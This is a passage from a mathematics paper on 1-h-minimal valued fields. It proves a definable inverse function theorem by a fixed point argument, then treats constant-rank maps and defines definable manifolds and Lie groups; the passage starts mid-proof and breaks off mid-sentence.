\[y-b=f^{\prime}(b)^{-1}(f(y)-f(b))-f^{\prime}(b)^{-1}f_{2}(b)(y-b)^{2}-\cdots-f^{ \prime}(b)^{-1}f_{n}(b)(y-b)^{n}+O(y-b)^{n+1}.\] Putting \(y=f^{-1}(x)\), and remembering \(x-a=O(y-b)\) we conclude \[(\diamond)\ f^{-1}(x)-f^{-1}(a)=f^{\prime}(f^{-1}(a))^{-1}(x-a)+\sum_{2\leq i \leq n}c_{i}(a)(f^{-1}(x)-f^{-1}(a))^{i}+O(x-a)^{n+1},\] for some constants \(c_{i}(a)\). Next we proceed to showing (by induction on \(k\leq n\)) that \(f^{-1}\) is \(P_{k}\). As \(P_{0}\) follows from the equality \(|f^{-1}(x)-f^{-1}(y)|=|x-y|\), we assume that So suppose \(f^{-1}\) is \(P_{k-1}\). Using this, we can write \(f^{-1}(x)-f^{-1}(a)=\sum_{1\leq j<k}b_{j}(a)(x-a)^{j}+O(x-a)^{k}\), and apply a direct computation to obtain that \[c_{i}(a)(f^{-1}(x)-f^{-1}(a))^{i}=\sum_{i\leq j\leq k}d_{ij}(a)(x-a)^{j}+O(x-a )^{k+1}.\] for some constants \(d_{ij}\). Note that as \(i\geq 2\) we obtain the improved error \(O(x-a)^{k+1}\). Substituting this in \((\diamond)\), we the conclusion follows. Now suppose \(f\) is \(T_{n}\) at \(b\). The proof in this case is similar: \[f^{-1}(x)-f^{-1}(x^{\prime})=f^{\prime}(f^{-1}(x^{\prime}))^{-1}(x-x^{\prime} )+\sum_{2\leq i\leq n}c_{i}(f^{-1}(x^{\prime}))(f^{-1}(x)-f^{-1}(x^{\prime})) ^{i}+O(x-x^{\prime})^{n+1},\] so, as above, if \(f^{-1}(x)\) is \(T_{k-1}\) we obtain \[f^{-1}(x)-f^{-1}(x^{\prime})=f^{\prime}(f^{-1}(x^{\prime}))^{-1}(x-x^{\prime} )+\sum_{2\leq i\leq k}d_{i}(x^{\prime})(x-x^{\prime})^{i}+O(x-x^{\prime})^{k+1}.\] Here note that \(f^{\prime}\) is \(P_{n-1}\) at \(b\) and so \(f^{\prime}(f^{-1}(x^{\prime}))^{-1}\) is \(P_{k-1}\) at \(a\). Also, following the above argument we see that the coordinates of \(d_{i}(x^{\prime})\) are sum and products of functions of the form \(b_{i^{\prime}}(x^{\prime})\) with \(1\leq i^{\prime}<i\), for \(b_{i^{\prime}}(x^{\prime})\) a \(P_{k-1-i^{\prime}}\) function at \(a\) (by the induction hypothesis that \(f^{-1}\) is \(T_{k-1}\)), and functions of the form \(c_{i^{\prime}}(f^{-1}(x^{\prime}))\) for \(c_{i^{\prime}}(y^{\prime})\) a \(P_{k-i^{\prime}}\) function at \(b\), \(i^{\prime}\leq i\) (by the assumption that \(f\) is \(T_{n}\)). So \(d_{i}(x^{\prime})\) is a \(P_{k-i}\) at \(a\). The next lemma will be important in our study of the differential structure of definable groups. For the statement, recall that \(O_{x}\) means that the constant implicit in the notation depends on \(x\), see Definition 2.1. **Lemma 3.15**.: _Let \(f:U\times V\to K^{r}\) be a definable function, where \(U\subset K^{n}\) and \(V\subset K^{m}\) are open sets around \(0\). Suppose \(f(x,y)\) is \(T_{2}\) at \((0,0)\), and \(f(x,y)=O(x,y)^{3}\). If \(axy+f(x,y)=O_{x}(y^{2})\), then \(a=0\)._ Proof.: By the definition of \(T_{2}\) (with \(x=x^{\prime}\), \(y^{\prime}=0\)) we get \(f(x,y)=f_{0}(x)+f_{1}(x)y+O(y^{2})\), for \(f_{1}\) a \(P_{1}\) function at \(0\) and \(f_{0}\) a \(P_{2}\) function at \(0\). Fixing \(x\) and expanding the Taylor polynomial of \(f(x,y)\) the uniqueness of Taylor coefficients (Lemma 3.10) gives, using our assumption, \(axy+f_{0}(x)+f_{1}(x)y=0\). Expanding \(f_{0},f_{1}\) around \(0\) and keeping in mind \(f(x,y)=O(x,y)^{3}\) we get \(f_{0}(x)=O(x^{3})\) and \(f_{1}(x)=O(x^{2})\). Indeed, we have \(f_{0}(x)=b_{0}+b_{1}x+b_{2}x^{2}+O(x^{3})\) and \(f_{1}(x)=c_{0}+c_{1}x+O(x^{2})\) so \(f(x,y)=b_{0}+b_{1}x+b_{2}x^{2}+c_{0}y+c_{1}xy+O(x,y)^{3}=O(x,y)^{3}\), so from the uniqueness of the Taylor coefficients we get \(b_{0}=b_{1}=b_{2}=c_{0}=c_{1}=0\). Now from \(axy=O(x,y)^{3}\), we get \(a=0\), by the uniqueness of Taylor coefficients again. ## 4. Strictly differentiable definable maps In this section we prove an inverse function theorem for definable strictly differentiable maps in a 1-h-minimal valued fields. This is done adapting a standard argument from real analysis using Banach's fixed point theorem. In the present section we use definable spherical completeness to obtain a definable version of Banach's fixed point theorem, implying, almost formally, the desired inverse function theorem. From the inverse function theorem we deduce results on the local structure of immersions and submersions in the usual way. We then proceed to proving a generic version of the theorem on the local structure of functions of constant rank (Proposition 4.11). This last result is obtained only generically. The reason is that definable functions whose partial derivative with respect to a variable \(x\) is \(0\) on an open set, \(U\) need not be locally constant in \(x\) in \(U\). For that reason, we give a different argument for a weaker result, see Proposition 4.8, and the discussion preceding it. Throughout the rest of this section, we fix an \(\aleph_{0}\)-saturated 1-h-minimal valued field \(K\). We start with a fixed point theorem, mentioned in [4, Remark 2.7.3]. We first note that a version of definable spherical completeness of \(1\)-h-minimal fields ([4, Lemma 2.7.1]) holds in positive residue characteristic: **Lemma 4.1**.: _Suppose \(K\) has positive residue characteristic \(p\). Suppose \(\{B_{i}\}_{i}\) is a definable chain of open balls or a definable chain of closed balls. Suppose, further, that for every \(i\) there is \(j\) such that \(\text{rad}(B_{j})\leq|p|\text{rad}(B_{i})\). Then \(\bigcap_{i}B_{i}\neq\emptyset\)._ Proof.: The proof is similar to spherical completeness in residue characteristic \(0\), see Lemma 2.7.1 of [4]. It is enough consider the \(1\)-dimensional case, since the higher dimensional case follows by considering the coordinate projections. Note also that our assumption implies that the chain \(\{B_{i}\}\) has no minimal element (as such an element would have valuative radius \(0\)). The closed case follows from the open case as follows: given a definable chain \(\{B_{i}\}_{i\in I}\) of closed balls. For each \(i\) let \(r_{i}\) be the valuative radius of \(B_{i}\) and let \(B_{i}^{\prime}\) be the unique open ball \(B\subseteq B_{i}\) of valuative radius \(r_{i}\) with the additional property that \(B\supseteq B_{j}\) for all \(j<i\). Obviously, \(\bigcap_{i}B_{i}=\bigcap_{i}B_{i}^{\prime}\) (unless the chain \(B_{i}\) has a minimal element, in which case there is nothing to prove). Note that, in the above notation, the map \(B_{i}\mapsto r_{i}\) is injective, so there is no harm assuming that \(\{B_{i}\}\) is indexed by a subset of \(\Gamma\). Thus, our chain \(\{B_{i}\}\) has index set interpretable in \(RV\), so by [5, Proposition 2.3.2] there is a finite set \(C\)\(m\)-preparing the chain \(\{B_{i}\}\) for some \(m\in\mathbb{N}\). We claim that \(C\cap B_{i}\neq\emptyset\) for all \(i\in I\). This would finish the proof, since \(C\) is finite. Assume, therefore, that this is not the case, and let \(i_{0}\in I\) be such that \(B_{i_{0}}\cap C=\emptyset\). By assumption we can find \(i<i_{0}\) such that \(r_{i}<|p^{m}|r_{i_{0}}\). Then \(B_{i}\) is a ball \(m\)-next to \(C\), and since our chain has no minimal element, any ball \(B\subsetneq B_{i}\) that is an element of our chain is not \(m\)-prepared by \(C\), a contradiction. Note that by [3, Example 1.5] infinitely ramified \(1\)-h-minimal fields of positive residue characteristic need not be definably spherically model complete. Thus, the extra condition in the assumption of the above lemma is not superfluous. **Proposition 4.2**.: _Let \(B_{r}=\{x\in K^{n}:|x|\leq r\}\). Suppose \(f:B_{r}\to B_{r}\) is a definable function. Assume that for distinct \(x,y\in B_{r}\), we have_ 1. \(|f(x)-f(y)|<|x-y|\) _if the residue characteristic is_ \(0\)_._ 2. \(|f(x)-f(y)|\leq|p||x-y|\) _if the residue characteristic is_ \(p>0\)_._ _Then \(f\) has a unique fixed point in \(B_{r}\)._ Proof.: Uniqueness is immediate from the hypothesis. For existence take the family of balls of the form \(B(a)_{|f(a)-a|}\). It is a definable chain of balls indexed by \(a\in B_{r}\). Indeed if \(a,b\in B_{r}\) are distinct and the balls are disjoint then \(|f(a)-f(b)|=|a-b|\), as the distance of points in disjoint balls does not change. Note that in positive residue characteristic one has the additional hypothesis in Lemma 4.1, because \(|f(f(a))-f(a)|\leq|p||f(a)-a|\), by assumption 2 on \(f\). By the appropriate version of definable spherical completeness of 1-h-minimal fields (Lemma 2.7.1 of [4] for residue characteristic \(0\), Lemma 4.1 otherwise), we obtain a point \(x\) in the intersection of all balls. Then \(x\) is a fixed point of \(f\). Indeed, if we assume otherwise then for \(y=f(x)\), we have \(|f(y)-y|<|f(x)-x|\) by the hypothesis. On the other hand if \(a\) is arbitrary then, as \(x\in B(a)_{|f(a)-a|}\), one has \(|f(x)-f(a)|\leq|x-a|\leq|f(a)-a|\) and so \(|f(x)-x|\leq|f(a)-a|\). This is a contradiction and finishes the proof. Just as in real analysis this fixed point theorem implies an inverse function theorem. **Proposition 4.3**.: _Suppose \(f:U\to K^{n}\) is a definable function from an open set \(U\subset K^{n}\) satisfying the following "bilipschitz condition": for every \(x,y\in U\) distinct_ 1. \(|f(x)-f(y)-(x-y)|<|x-y|\) _if the residue characteristic is_ \(0\)_._ 2. \(|f(x)-f(y)-(x-y)\leq|p||x-y|\) _if the residue characteristic is_ \(p>0\)_._ _Then \(f(U)\) is open and \(f\) is a homeomorphism from \(U\) to \(f(U)\). If \(f\) is (strictly) differentiable then \(f^{-1}\) is (strictly) differentiable._ Proof.: Injectivity of the map follows directly from the hypothesis. The same assumptions also imply that if \(x,y\in U\) are distinct then \(|f(x)-f(y)|=|x-y|\), implying continuity of the inverse. The main difficulty is showing that \(f(U)\) is open. Translating, we may assume \(0\in U\) and \(f(0)=0\). We have to find an open neighborhood of \(0\) in \(f(U)\). Take \(r>0\) such that \(0\in B_{r}\subset U\). Then \(B_{r}\subset f(U)\). Indeed, if \(|a|\leq r\) then, by the same reasoning as above, the function \(g(x)=x+a-f(x)\) satisfies \(g(B_{r})\subset B_{r}\). By the assumptions on \(f\) this implies that \(g\) satisfies the hypothesis of Proposition 4.2. So \(g(x_{0})=x_{0}\) for some \(x_{0}\), namely, \(a=f(x_{0})\), as claimed. Differentiability (and strict differentiability) of \(f^{-1}\) now follow from 3.13. We can finally formulate and prove the inverse function theorem for \(1\)-h-minimal fields: **Proposition 4.4**.: _Suppose \(f:U\to K^{n}\) is a definable function from an open set \(U\subset K^{n}\). Suppose \(f\) is strictly differentiable at \(a\) and \(f^{\prime}(a)\) is invertible. Then there is an open set \(V\subseteq U\) around \(a\) such that \(f(V)\) is open and \(f:V\to f(V)\) is a bijection whose inverse is strictly differentiable at \(f(a)\)._ Proof.: By the definition of strict differentiability the function \(f^{\prime}(a)^{-1}f\) satisfies the hypothesis of the previous proposition in a small open ball around \(a\). The conclusion follows. We do not know whether a definable function, \(f:U\to K\), with continuous partial derivatives, but such that \(f\) is not strictly differentiable in \(U\) could exist2. Clearly, sums, products and compositions of strictly differentiable functions are strictly differentiable, and so are locally analytic functions. Moreover, strict differentiability is first order definable, and therefore extends to elementary extensions. Also, by the generic Taylor approximation theorem, in the \(1\)-h-minimal context, any definable function in an open subset of \(K^{n}\) is strictly differentiable in a dense open subset. See Proposition 3.12. Footnote 2: In real analysis it is well known that a function \(f:U\to\mathbb{R}\) is \(\mathcal{C}^{1}\) in \(U\) if and only if it is strictly differentiable there. Our next goal is to study definable functions of constant rank. We first note, that without the assumption of definability, a strictly differentiable function whose derivative vanishes identically need not be locally constant: **Example 4.5**.: Consider a function \(f:\mathcal{O}\to\mathcal{O}\) that is locally constant in \(B\setminus\{0\}\) but near \(0\) it grows like \(x^{2}\). Such a function \(f\) will be strictly differentiable, with \(f^{\prime}\equiv 0\), but \(f\) is not locally constant at \(0\). Roughly, a function as in the above example involves an infinite number of choices, so it is not definable. In contrast we have: **Proposition 4.6**.: _Let \(f:U\to K^{m}\) be a function definable in an open set \(U\subset K^{n}\). Assume \(f\) is continuous. Assume \(f\) is differentiable with derivative \(0\) on an open dense subset of \(U\). Then \(f\) is locally constant with finite image._ Proof.: We proceed by induction on \(n\), the dimension of the domain. We may assume \(m=1\). First assume \(n=1\). By the valuative Jacobian property in [4, Corollary 3.1.6] and [5, Corollary 3.1.3], there is a finite set \(C\subset U\) such that in \(U\setminus C\) the function \(f\) is locally constant. This implies that the fibers of \(f|_{U\setminus C}\) are of dimension 1, and so the image of \(f\) is finite. As \(f\) is continuous it is locally constant, the fibers form a finite partition of closed and so open sets on which \(f\) is constant. Now assume the proposition is valid for \(n\), and suppose \(U\subset K^{n}\times K\). We denote \(\pi_{1}:K^{n}\times K\to K^{n}\) the projection onto the first factor and \(\pi_{2}:K^{n}\times K\to K\) the projection onto the second factor. Let \(V\subset U\) be an open dense subset such that \(f\) is differentiable at \(V\) with derivative \(0\). Denote \(C=U\setminus V\). Let \(T=\{x\in K^{n}\mid\dim(\pi_{1}^{-1}(x)\cap C)=1\}\) then \(\dim(T)<n\). We conclude that there is an open dense set \(W\subset K^{n}\) such that \(\dim(\pi_{1}^{-1}(x)\cap C)=0\) for all \(x\in W\). Similarly, there is an open dense set \(P\subset K\) such that \(\dim(\pi_{2}^{-1}(x)\cap C)<n\) for every \(x\in P\). Shrinking \(V\) to \(V\cap\pi_{1}^{-1}(W)\cap\pi_{2}^{-1}(P)\) we may assume that if \((x,y)\in V\) then \(V_{x}\) is an open dense subset of \(U_{x}\) and \(V_{y}\) is an open dense subset of \(U_{y}\). By the induction hypothesis and the \(n=1\) case, we conclude that \(f_{x}\) and \(f_{y}\) are locally constant. This implies that the fiber \(f^{-1}f(x,y)\) has dimension \(n+1\). Indeed, if \(B\) is an open neighborhood of \(y\) on which \(f_{x}\) is constant and for each \(y^{\prime}\in B\) we take \(R_{y^{\prime}}\subset U_{x}\) an open neighborhood of \(x\) on which \(f_{y^{\prime}}\) is constant, then \(f\) is constant on \(\bigcup_{y^{\prime}\in B}R_{y^{\prime}}\times\{y^{\prime}\}\).By dimension considerations, we conclude that the image \(f(V)\) is finite. As \(f\) is continuous, \(f^{-1}f(V)\) is closed in \(U\), and as \(V\) is dense in \(U\), we conclude \(f(U)=f(V)\) is finite. As \(f\) is continuous, we conclude \(f\) is locally constant as before. Given the previous proposition we may expect that a definable strictly differentiable function \(f:U\to K^{m}\) with open domain \(U\subset K^{r}\times K^{s}\) and satisfying that \(D_{y}f(x,y)=0\), is locally of the form \(f(x,y)=g(x)\). Unfortunately this is not true. **Example 4.7**.: Take \(f:\mathcal{O}\times\mathcal{O}\to\mathcal{O}\) defined by \(f(x,y)=0\) if \(|y|>|x|\) and \(f(x,y)=x^{2}\) if \(|y|\leq|x|\). Then \(f\) is strictly differentiable, \(f(x,\cdot)\) is locally constant, but \(f\) is not of the form \(g(x)\) near \((0,0)\). It is due to this pathology that the conclusion of Proposition 4.11 below only holds generically. Below, we let \(D_{y}f(x,y)\) be the differential of the function \(f_{x}\), given by \(f_{x}(y)=f(x,y)\); we call this the derivative of \(f\) with respect to \(y\) (where \(y\) can be a tuple of variables). **Proposition 4.8**.: _Suppose \(U\subset K^{n}\), and \(V\subset K^{r}\) are open and \(f:U\times V\to K^{m}\) is a definable function such that \(f\) is continuous and \(D_{y}f=0\) on a dense open subset of \(\operatorname{dom}(f)\). Then there exists an open dense set \(U^{\prime}\subset U\) such that \(f|_{U^{\prime}}\) is locally of the form \(g(x)\)._ Proof.: The set, \(D\) of points \(x\in U\) such that for every point of \(\{x\}\times V\)\(f\) is locally of the form \(g(x)\) is definable. More precisely, \(x\in D\) exactly when for all \(y\in V\), there exists an open ball \(B\ni(x,y)\), such that for all \((x^{\prime},y^{\prime}),(x^{\prime},y^{\prime\prime})\in B\) we have \(f(x^{\prime},y^{\prime})=f(x^{\prime},y^{\prime\prime})\). Thus, the statement that \(D\) has dense interior in \(U\) is a first order expressible property, so we may assume that \(\operatorname{acl}=\operatorname{dcl}\), see Fact 2.5 and the subsequent remark. In the course of the proof we may replace \(U\) by a dense open subset a finite number of times. Fix, \(W\subset U\times V\), a dense open set where \(f\) is differentiable and its derivative with respect to \(y\) is \(0\). Shrinking \(U\) we may assume \(W_{x}\subset V\) is dense open for all \(x\in U\). By Proposition 4.6 we know that \(f_{x}\) is locally constant with finite image for every \(x\in U\) (recall that \(f_{x}(y):=f(x,y)\)). The sets \(\operatorname{Im}(f_{x})\) form a definable family of finite sets indexed by \(x\in U\), so there is uniform bound, \(n\), on their cardinalities. Denoting \(A_{k}=\{x\in U:|\operatorname{Im}(f_{x})|=k\}\) we have \(U=A_{1}\cup\cdots\cup A_{n}\), so the union of the interiors of the \(A_{k}\) form a dense open subset of \(U\). Since the closures of the \(\operatorname{Int}(A_{k})\) are pairwise disjoint, we may assume that \(|\operatorname{Im}(f_{x})|=k\) for all \(x\) and some fixed \(k\). Since we assumed that \(\operatorname{acl}=\operatorname{dcl}\), there are definable functions \(r_{1},\ldots,r_{k}:U\to K^{m}\) such that \(\{r_{1}(x),\ldots,r_{k}(x)\}=\operatorname{Im}(f_{x})\). By generic continuity of definable functions (Proposition 2.12) we may assume that \(r_{i}\) are all continuous. Then the sets \(B_{i}=\{(x,y):f(x,y)=r_{i}(x)\}\) form a finite partition of \(U\times V\) into closed, and so open subsets. The next two results, describing the local structure of definable maps of full rank, are standard applications of the inverse function theorem: **Proposition 4.9**.: _Suppose \(U\subset K^{k}\) is a definable open set and \(f:U\to K^{k}\times K^{r}\) is a definable, strictly differentiable map. Suppose that for some \(a\in U\) the derivative \(f^{\prime}(a)\) has full rank. Then there is a ball \(a\in B\subset U\), a ball \(B_{2}\ni 0\), a definable open set \(V\subset K^{k}\times K^{r}\), and a definable strict diffeomorphism \(\varphi:V\to B\times B_{2}\) such that \(f(B)\subset V\) and the composition \(\varphi f:B\to B\times B_{2}\) is the inclusion \(b\mapsto(b,0)\)._ Proof.: After a coordinate permutation in the target we may assume the principal \(k\times k\) minor of \(f^{\prime}(a)\) is invertible. Consider the function \(g:U\times K^{r}\to K^{k}\times K^{r}\) defined as \(g(x,y)=f(x)+(0,y)\). Then \(g\) is strictly differentiable and has invertible derivative at \((a,0)\) so by the inverse function theorem, Proposition 4.4, we can find a ball \(B\) around \(a\) and a ball \(B_{2}\) around \(0\), and open set \(f(a)\in V\) such that \(g\) restrict to a strict diffeomorphism \(g:B\times B_{2}\to V\). If \(i:B\to B\times B_{2}\) is the inclusion \(i(b)=(b,0)\) then we get that \(gi=f\), so we conclude the statement is valid with \(\varphi=g^{-1}\). **Proposition 4.10**.: _Suppose \(U\subset K^{k}\times K^{r}\) is a definable open set, and \(f:U\to K^{k}\) is a definable strictly differentiable map. Let \(a\in U\). Suppose \(f^{\prime}(a)\) has full rank. Then there exists a definable open set \(a\in U^{\prime}\subset U\), a ball \(f(a)\in B\), a ball \(B_{2}\subseteq K^{r}\), and a definable strict diffeomorphism \(\varphi:B\times B_{2}\to U^{\prime}\), such that \(f(U^{\prime})\subset B\) and the composition \(f\varphi:B\times B_{2}\to B\) is the projection \((b,c)\mapsto b\)._ Proof.: After applying a coordinate permutation to \(U\) we may assume that the principal \(k\times k\) minor of \(f^{\prime}(a)\) is invertible. Consider the function \(g:U\to K^{k}\times K^{r}\) defined as \(g(x,y)=(f(x,y),y)\). Then \(g\) is strictly differentiable with invertible differential, so by the inverse function theorem, Proposition 4.4, there is an open set \(a\in U^{\prime}\subset U\) such that \(g(U^{\prime})\) is open and \(g:U^{\prime}\to g(U^{\prime})\) is a strict diffeomorphism. Making \(U^{\prime}\) smaller we may assume \(g(U^{\prime})=B\times B_{2}\) is a product of two balls. Then if \(p:B\times B_{2}\to B\) is the projection \(p(b,c)=b\), we get that \(pg=f\) and so the statement is valid with \(\varphi=g^{-1}\). We can finally prove our result on the local structure of definable functions of constant rank: **Proposition 4.11**.: _Let \(U\subset K^{k}\times K^{r}\) and \(V\subset K^{k}\times K^{s}\) be open definable sets and let \(f:U\to V\) be a definable strictly differentiable map such that for all \(a\in U\) the rank of \(f^{\prime}(a)\) is constant equal to \(k\). Then there exist \(U^{\prime}\subset U\) and \(V^{\prime}\subset V\) definable open sets, such that \(f(U^{\prime})\subset V^{\prime}\) and there are definable strict diffeomorphisms \(\varphi_{1}:B_{1}\times B_{2}\to U^{\prime}\) and \(\varphi_{2}:V^{\prime}\to B_{1}\times B_{3}\), such that the composition \(\varphi_{2}f\varphi_{1}:B_{1}\times B_{2}\to B_{1}\times B_{3}\) is the map \((a,b)\mapsto(a,0)\)._ Proof.: Take a point \((b,c)\in U\). After a coordinate permutation in \(U\) and \(V\) we may assume \(f^{\prime}(b,c)\) has its first \(k\times k\) minor invertible. Then by the theorem on submersions, Proposition 4.10, applied to the composition of \(f:U\to K^{k}\times K^{s}\) with the projection \(K^{k}\times K^{s}\to K^{k}\) onto the first factor, we may assume that \(U\) is of the form \(B_{1}\times B_{2}\) and \(f\) is of the form \(f(x,y)=(x,g(x,y))\). As \(f^{\prime}\) has constant rank equal to \(k\) we conclude that \(D_{y}g=0\). By the Proposition 4.8 we may assume \(g(x,y)\) is of the form \(g(x,y)=g(x)\) (after passing to smaller open balls of \(B_{1}\) and \(B_{2}\) not necessarily containing \((b,c)\)). Now the function \(h:B_{1}\to K^{k}\times K^{s}\) defined by \(h(x)=(x,g(x))\) is a definable strictly differentiable immersion so by the theorem on immersions 4.9 we may after shrinking \(B_{1}\) and composing with a definable diffeomorphism in the target assume that \(h\) is of the form \(h(x)=(x,0)\). This finishes the proof. ## 5. Strictly differentiable definable manifolds In this section we define definable manifolds in a 1-h-minimal field, and variants. These are manifolds which are covered by a finite number of definable charts, with compatibility functions of various kinds. Throughout, we keep the convention that \(K\) is an \(\aleph_{0}\)-saturated \(1\)-h-minimal field. In case \(\operatorname{acl}_{K}\) is not the same as \(\operatorname{dcl}_{K}\) it is better to take "etale domains" instead of open subsets of \(K^{n}\) as the local model of the manifold. This is because the cell decomposition, as provided by Proposition 2.15, decomposes a definable set into a finite number of pieces, each of which is only a finite cover of an open set, instead of an open set. We describe this notion formally below: **Definition 5.1**.: Let \(S\subset K^{m}\). A definable function \(f:S\to K^{n}\) is (topologically) etale if it is a local homeomorphism. In other words, for every \(x\in T\) there is a ball \(x\in B\) such that \(f(B\cap S)\) is open and the inverse map \(f(B\cap S)\to B\cap S\to K^{m}\) is continuous. Informally, we think of etale maps as similar to open immersions, and will denote such maps accordingly e.g., \(i:U\to K^{n}\). We now proceed to describing the differential structure of etale maps (or, rather, etale domains): **Definition 5.2**.: Suppose \(i:U\to K^{n}\) and \(j:V\to K^{m}\) are etale maps. A definable function \(f:U\to V\) is strictly differentiable at \(x\in U\) if there are balls \(x\in B\) and \(f(x)\in B^{\prime}\) such that \(i:B\cap U\to i(B\cap U)\), \(j:B^{\prime}\cap V\to j(B^{\prime}\cap V)\) are homeomorphisms onto open sets, such that \(f(B\cap U)\subset B^{\prime}\cap V\), and the map \(i(B\cap U)\xrightarrow{i-1}B\cap U\xrightarrow{f}B^{\prime}\cap V \xrightarrow{j}j(B^{\prime}\cap V)\) is strictly differentiable at \(i(x)\). In this case the derivative \(f^{\prime}(x)\) is defined as the derivative of \(i(B\cap U)\to j(B^{\prime}\cap V)\). The function \(f:U\to V\) is called \(T_{k}\) at \(x\) if the composition \(i(B\cap U)\to j(B^{\prime}\cap V)\) is \(T_{k}\) at \(i(x)\). Note that with this definition the given inclusion \(U\subset K^{r}\) is not necessarily strictly differentiable, because the local inverses \(i(U\cap B)\to K^{r}\) of the map \(i:U\to K^{n}\) are only topological embeddings, so not necessarily strictly differentiable. **For the rest of this section let \(\mathcal{P}\) stand for any one of the following adjectives: topological, strictly differentiable, or \(T_{n}\)**. **Definition 5.3**.: A definable weak \(\mathcal{P}\)-\(n\)-manifold is a definable set, \(M\), equipped with a finite number of definable injections, \(\varphi_{i}:U_{i}\to M\), and each \(U_{i}\) comes equipped with an etale map \(r_{i}:U_{i}\to K^{n}\). We require further that the sets \(U_{ij}:=\varphi_{i}^{-1}(\varphi_{j}(U_{j}))\) are open in \(U_{i}\), and that the transition maps \(U_{ij}\to U_{ji}\), \(\varphi_{j}^{-1}\varphi_{i}\) are \(\mathcal{P}\)-maps. We further define: 1. A definable weak \(\mathcal{P}\)-manifolds is a weak \(\mathcal{P}\)-\(n\)-manifolds for some \(n\). 2. A weak \(\mathcal{P}\)-manifold is equipped with a topology making the structure maps, \(\varphi_{i}\), open immersions. 3. A morphism of definable weak \(\mathcal{P}\)-manifolds is a definable function \(f:M\to N\), such that for any charts \(\varphi_{i}:U_{i}\to M\) and \(\tau_{j}:V_{j}\to N\) the set \(W_{ij}=\varphi_{i}f^{-1}\tau_{j}(V_{j})\) is open in \(U_{i}\) and the map \(W_{ij}\to V_{j}\) given by \(x\mapsto\tau_{j}^{-1}f\varphi_{i}(x)\) is a \(\mathcal{P}\)-map. 4. A definable \(\mathcal{P}\)-\(n\)-manifold is a definable weak \(\mathcal{P}\)-\(n\)-manifold, where the \(U_{i}\) are open subsets of \(K^{n}\) (and the maps \(U_{i}\to K^{n}\) are inclusions). 5. A morphism of definable \(\mathcal{P}\)-manifolds is a morphism of weak definable \(\mathcal{P}\)-manifolds. Definable weak \(K\)-manifolds are, immediately from the definition, (abstract) manifolds over \(K\). As such, definable differentiable weak manifold inherit the classical differential structure. For the sake of completeness we remind the relevant definitions: **Definition 5.4**.: If \(M\) is a definable strictly differentiable weak manifold and \(x\in M\), then the tangent space of \(M\) at \(x\), \(T_{x}(M)\), is the disjoint union of \(T_{i}=T_{\varphi_{i}^{-1}(x)}(U_{i})=K^{n}\) for \((U_{i},\varphi_{i})\) a chart around \(x\), under the identification of the spaces \(T_{i}\) and \(T_{j}\) associated with the charts \(U_{i},U_{j}\) via the map \((\varphi_{j}^{-1}\varphi_{i})^{\prime}(\varphi_{i}^{-1}(x))\). For a strictly differentiable definable morphism \(f:M\to N\) of definable strictly differentiable weak manifolds, we have a map of \(K\)-vector spaces \(f^{\prime}(x):T_{x}(M)\to T_{f(x)}(N)\) given by the differential of the map appearing in Definition 5.3 above. As usual, once we have a chart around a point in a weak strictly differentiable manifold, we get an identification of \(T_{x}(M)\) with \(K^{n}\), but distinct charts may give distinct isomorphisms. **Definition 5.5**.: A definable (weak) \(\mathcal{P}\)-Lie group is a group object in the category of definable (weak) \(\mathcal{P}\)-manifolds. **Lemma 5.6**.: _Suppose \(i:U\to K^{n}\) and \(j:V\to K^{m}\) are etale and \(f:U\to V\) is a definable map. Then \(f\) is continuous in an open dense subset of \(U\)._ _Also \(f\) is strictly differentiable and \(T_{k}\) in an open dense subset of \(U\)._ Proof.: For the statement about continuity, note that \(V\) has the subspace topology (of \(V\subset K^{r}\)) so we may assume \(V=K^{r}\). If we denote \(U^{\prime}\) the interior (relative to \(U\)) of the set of points of \(U\) where \(f\) is continuous, then in every ball \(B\) where \(i\) is a homeomorphism \(i:B\cap U\to i(B\cap U)\) we get that \(B\cap U\cap U^{\prime}\) is dense in \(B\cap U\), by generic continuity of definable functions. We conclude that \(U^{\prime}\) is dense as required. For strict differentiability and \(T_{k}\), by the above we may assume that \(f\) is continuous. Let \(U^{\prime}\) be the interior of the set of all points where \(f:U\to V\) is strictly differentiable and \(T_{k}\). This is a definable open set. By generic differentiability and generic \(T_{k}\) property for functions defined on open sets, for every point \(x\in U\) there is an open ball \(B\ni x\), such that \(U\cap B\cap U^{\prime}\) is dense in \(U\cap B\). Thus, we conclude that \(U^{\prime}\) is dense in \(U\). Note that the previous lemma implies that a (weak) definable topological manifold \(M\) contains an open dense subset \(U\subset M\), which admits a structure of a (weak) definable \(T_{n}\) manifold extending the given (weak) definable topological manifold structure. As a consequence of Proposition 5.7 below we have that this structure on \(U\) is unique up to isomorphism and restriction to a definable open dense subset. For that reason, several of the statements below hold (essentially unaltered) for definable weak manifolds (without further assumptions on differentiability or \(T_{n}\)). For the sake of clarity of the exposition, we keep these assumptions. **Proposition 5.7**.: _If \(f:M\to N\) is a definable function and \(M\), \(N\) are definable weak \(\mathcal{P}\)-manifolds, then \(f\) is a \(\mathcal{P}\)-map in an open dense set of \(M\)._ Proof.: Considering the charts in \(M\) we may assume \(M=U\to K^{n}\) is etale. Now if \((V_{i},\tau_{i})\) are charts for \(N\), then \(f^{-1}\tau_{i}(V_{i})\) cover \(U\), and so the union of their interiors is open dense in \(U\). So we may assume \(N=V\to K^{m}\) is etale. This case is Lemma 5.6. Recall that the local dimension of a definable set \(X\) is defined as \[\dim_{x}X=\min\{\dim(B\cap X):x\in B\text{ is a definable open neighborhood of }x\text{ in }M\}.\] The next lemma is standard: **Lemma 5.8**.: _Suppose \(M\) is a definable topological weak manifold. Let \(X\subset M\) be a definable subset. Then \(\dim(X)=\max_{x\in X}\dim_{x}(X)\)._ _If \(G\) is a definable weak topological group and \(H\) is a subgroup, then the dimension of \(H\) is the local dimension of \(H\) at any point._ Proof.: If \(M=U_{1}\cup\dots\cup U_{n}\) is a covering by open sets and \(\varphi_{i}:U_{i}\to V_{i}\) is a homeomorphism onto a set \(V_{i}\), with an etale map \(V_{i}\to K^{n}\), then \(\dim(X)=\max_{i}(\dim(\varphi_{i}(X\cap U_{i})))\), and the local dimension of \(X\) at \(x\in X\cap U_{i}\) is the local dimension of \(\varphi_{i}(X\cap U_{i})\) at \(\varphi_{i}(x)\), so we reduce to the case \(M=V\) is etale over \(K^{n}\). In fact, the result is true whenever \(M\subset K^{m}\) with the subspace topology, as then the local dimension of \(X\subset M\) at a point \(x\) equals the local dimension of \(X\) at \(x\) in \(K^{m}\), and so the result follows from Proposition 2.11(3). If \(G\) is a definable weak topological group and \(H\) is a subgroup, then the local dimension of \(H\) at any point \(h\in H\) is constant independent of \(h\). Indeed the 